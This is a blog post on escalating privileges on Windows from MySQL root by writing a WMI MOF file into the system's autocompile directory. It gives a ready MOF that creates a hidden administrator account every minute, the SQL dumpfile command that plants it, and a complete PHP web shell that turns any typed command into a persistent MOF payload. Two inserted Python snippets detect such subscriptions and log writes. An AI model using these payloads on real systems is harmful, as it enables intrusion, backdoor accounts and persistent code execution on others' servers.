1. MOF

  A Managed Object Format (MOF) file is a convenient way to create and register providers, event categories and events. Once the class instances and class definitions have been written in the MOF file, the file can be compiled; compiling it registers all of those class definitions and instances in the CIM repository. After that, the provider, event-category and event information is available to WMI and to Visual Studio Analyzer. In short: create the provider, event-category and event class instances in the MOF file, define the custom objects you want to analyze, and then compile the file.


2. How the privilege escalation works

  The MOF file here is a Windows system file (C:/windows/system32/wbem/mof/nullevt.mof), the "Managed Object Format" file; its job is to go and monitor process creation and termination every five seconds.

  Once you hold root privileges in MySQL, you use those root privileges to upload our own MOF file. After a certain interval the MOF file gets executed. The MOF contains a VBS script section, and that script is usually a cmd command that adds an administrator user.


3. Privilege escalation steps

  MOF file code (remember to change the account name and password):

#pragma namespace("\\\\.\\root\\subscription")

// Filter: matches the Win32_LocalTime instance whenever its Second field equals 5,
// i.e. one match per minute, which is what turns this subscription into a timer.
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: a JScript ActiveScriptEventConsumer that launches the command through WScript.Shell.
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add\")";
};

// Binding: ties the filter to the consumer. All three objects live in root\subscription,
// so the subscription is permanent and survives reboots until it is removed.
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter   = $EventFilter;
};
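From the defender's side, the three objects above are exactly what a triage script should look for in a MOF file pulled from the wbem\mof drop directory or from a MySQL dumpfile write. The following Python is an added example, not code from the original post: it parses the instance blocks, follows the __FilterToConsumerBinding to its filter and consumer, and reports why the pair looks like a persistence trigger (script consumer, WScript.Shell and net user payload markers, Win32_LocalTime timer filter). The sample MOF is constructed to mirror the post's file; the grammar is a lightweight triage parser, not a full MOF parser.

```python
import re
# Constructed sample shaped like the MOF in the post (same filter/consumer names and command).
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{ EventNamespace = "Root\\Cimv2"; Name = "filtP2";
  Query = "Select * From __InstanceModificationEvent "
          "Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
  QueryLanguage = "WQL"; };
instance of ActiveScriptEventConsumer as $Consumer
{ Name = "consPCSV2"; ScriptingEngine = "JScript";
  ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add\")"; };
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
'''

# Triage grammar, not a full MOF parser: 'instance of Class [as $Alias] { ... };' blocks with
# 'Name = value;' properties whose value is a run of quoted literals or a bare token such as $Alias.
INST_RE = re.compile(r'instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{(.*?)\}\s*;', re.S)
PROP_RE = re.compile(r'(\w+)\s*=\s*((?:"(?:[^"\\]|\\.)*"|[^;"])+);', re.S)
SCRIPT_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}
PAYLOAD_MARKERS = ("WScript.Shell", "net.exe user", "net user", "net localgroup")
def parse_instances(mof):
    out = []
    for cls, alias, body in INST_RE.findall(mof):
        props = {}
        for name, raw in PROP_RE.findall(body):
            parts = re.findall(r'"((?:[^"\\]|\\.)*)"', raw)  # adjacent literals "a" "b" concatenate
            # MOF escapes inside literals: \" \\ \n (any other escaped char is kept as itself)
            text = re.sub(r'\\(.)', lambda m: {"n": "\n"}.get(m[1], m[1]), "".join(parts))
            props[name] = text if parts else raw.strip()
        out.append({"class": cls, "alias": alias, "props": props})
    return out
def triage_subscription(mof):
    inst = parse_instances(mof)
    by_alias = {i["alias"]: i for i in inst if i["alias"]}
    findings = []
    for b in (i for i in inst if i["class"] == "__FilterToConsumerBinding"):
        flt = by_alias.get(b["props"].get("Filter", "").lstrip("$"))
        con = by_alias.get(b["props"].get("Consumer", "").lstrip("$"))
        if not (flt and con):
            continue
        reasons = []
        if con["class"] in SCRIPT_CONSUMERS:
            reasons.append("script/command consumer " + con["class"])
        text = con["props"].get("ScriptText", "") + con["props"].get("CommandLineTemplate", "")
        reasons += ["payload marker: " + m for m in PAYLOAD_MARKERS if m.lower() in text.lower()]
        if "Win32_LocalTime" in flt["props"].get("Query", ""):
            reasons.append("timer-style filter on Win32_LocalTime")
        findings.append({"filter": flt["props"].get("Name"), "consumer": con["props"].get("Name"), "reasons": reasons})
    return findings
```

The same checks apply to a live host: enumerate __EventFilter, ActiveScriptEventConsumer and __FilterToConsumerBinding in root/subscription with Get-CimInstance and run their properties through the same logic.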


  After uploading the MOF file through the shell, export it with an SQL statement (run in MySQL):

select load_file('C:/Inetpub/wwwroot/www.xxx.com/nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';
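The write above is only possible because mysqld is allowed to write arbitrary paths, and it leaves a clear trace in the general log. This added example (not from the original post) scans constructed MySQL general-log lines for INTO DUMPFILE / INTO OUTFILE statements aimed at the wbem\mof directory, and classifies the secure_file_priv setting that decides whether such a write can happen at all.

```python
import re

# Constructed MySQL general-log lines (time, thread id, command, argument), not taken from the post.
SAMPLE_LOG = """\
2021-08-13T09:57:01.000000Z\t   12 Query\tselect version()
2021-08-13T09:57:05.000000Z\t   12 Query\tselect load_file('C:/Inetpub/wwwroot/www.xxx.com/nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof'
2021-08-13T09:58:10.000000Z\t   13 Query\tselect 'a,b' INTO OUTFILE '/var/lib/mysql-files/export.csv'
2021-08-13T09:58:11.000000Z\t   13 Query\tselect '#pragma namespace' into dumpfile 'c:\\\\windows\\\\system32\\\\wbem\\\\mof\\\\system.mof'
"""

# INTO DUMPFILE writes raw bytes (the variant the post uses); INTO OUTFILE writes rows.
# Both are mysqld writing to disk, so both are checked against the WMI autocompile directory.
FILE_WRITE_RE = re.compile(r"\binto\s+(dumpfile|outfile)\s+'([^']*)'", re.I)

def is_mof_dropzone(path):
    # Collapse / and any run of backslashes (SQL-escaped paths arrive doubled) before comparing.
    norm = re.sub(r"[\\/]+", "/", path).lower()
    return "/wbem/mof/" in norm

def find_mof_writes(log_text):
    """Return one hit per log line that writes a file into ...\\wbem\\mof\\ ."""
    hits = []
    for line in log_text.splitlines():
        m = FILE_WRITE_RE.search(line)
        if m and is_mof_dropzone(m.group(2)):
            fields = line.split("\t")
            hits.append({"time": fields[0], "kind": m.group(1).lower(), "path": m.group(2)})
    return hits

def assess_secure_file_priv(value):
    """Classify the secure_file_priv value (None for SQL NULL) with respect to this write path."""
    if value is None or str(value).upper() == "NULL":
        return "disabled: LOAD_FILE and INTO DUMPFILE/OUTFILE cannot touch the filesystem"
    if value == "":
        return "unrestricted: any path the mysqld service account can write, wbem\\mof included"
    return "restricted to " + value
```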


4. Script-based privilege escalation (prefer the script; upload it to the web root)

  Fill in the MySQL account name and password; once inside the script, enter the command and run it.

<?php
// Uses the mysql_* extension, which exists in PHP 5.x only (removed in PHP 7).
$path = "c:/ini.txt";   // the MOF payload redirects the command's output here; it is read back with LOAD_FILE
session_start();
if (!empty($_POST['submit'])) {
    setcookie("connect");
    setcookie("connect[host]", $_POST['host']);
    setcookie("connect[user]", $_POST['user']);
    setcookie("connect[pass]", $_POST['pass']);
    setcookie("connect[dbname]", $_POST['dbname']);
    echo "<script>location.href='?action=connect'</script>";
}
if (empty($_GET["action"])) {
?>
<html>
<head><title>Win MOF Shell</title></head>
<body>
<form action="?action=connect" method="post">
Host:
<input type="text" name="host" value="192.168.200.144:3306"><br/>
User:
<input type="text" name="user" value="root"><br/>
Pass:
<input type="password" name="pass" value="toor"><br/>
DB:
<input type="text" name="dbname" value="mysql"><br/>
<input type="submit" name="submit" value="Submit"><br/>
</form>
</body>
</html>
<?php
exit;
}
if ($_GET['action'] == 'connect') {
    $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"])
        or die('<pre>' . mysql_error() . '</pre>');
    $strCmd = isset($_POST['cmd']) ? $_POST['cmd'] : '';   // define before use (the form echoes it back)
    echo "<form action='' method='post'>";
    echo "Cmd:";
    echo "<input type='text' name='cmd' value='$strCmd'>";
    echo "<br>";
    echo "<br>";
    echo "<input type='submit' value='Exploit'>";
    echo "</form>";
    echo "<form action='' method='post'>";
    echo "<input type='hidden' name='flag' value='flag'>";
    echo "<input type='submit' value=' Read  '>";
    echo "</form>";
    if (isset($_POST['cmd'])) {
        $cmdshell = 'cmd /c ' . $strCmd . '>' . $path;
        $mofname = "c:/windows/system32/wbem/mof/system.mof";
        // Backslashes are escaped once for this PHP string and once more for the MySQL string
        // literal, so every backslash wanted in the written MOF file needs four here.
        $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")

instance of __EventFilter as \$EventFilter
{
  EventNamespace = \"Root\\\\\\\\Cimv2\";
  Name  = \"filtP2\";
  Query = \"Select * From __InstanceModificationEvent \"
      \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"
      \"And TargetInstance.Second = 5\";
  QueryLanguage = \"WQL\";
};

instance of ActiveScriptEventConsumer as \$Consumer
{
  Name = \"consPCSV2\";
  ScriptingEngine = \"JScript\";
  ScriptText =
  \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";
};

instance of __FilterToConsumerBinding
{
  Consumer = \$Consumer;
  Filter = \$EventFilter;
};";
        mysql_select_db($_COOKIE["connect"]["dbname"], $conn);
        $sql1 = "select '$payload' into dumpfile '$mofname';";
        if (mysql_query($sql1)) {
            echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>";
        } else {
            die(mysql_error());
        }
        mysql_close($conn);
    }

    if (isset($_POST['flag'])) {
        $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"])
            or die('<pre>' . mysql_error() . '</pre>');
        $sql2 = "select load_file(\"" . $path . "\");";
        $result2 = mysql_query($sql2);
        while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
            echo "<hr/>";
            echo '<pre>' . $row[0] . '</pre>';
        }
        mysql_close($conn);
    }
}
?>


posted on 2021-08-13 17:57 by EndlessShw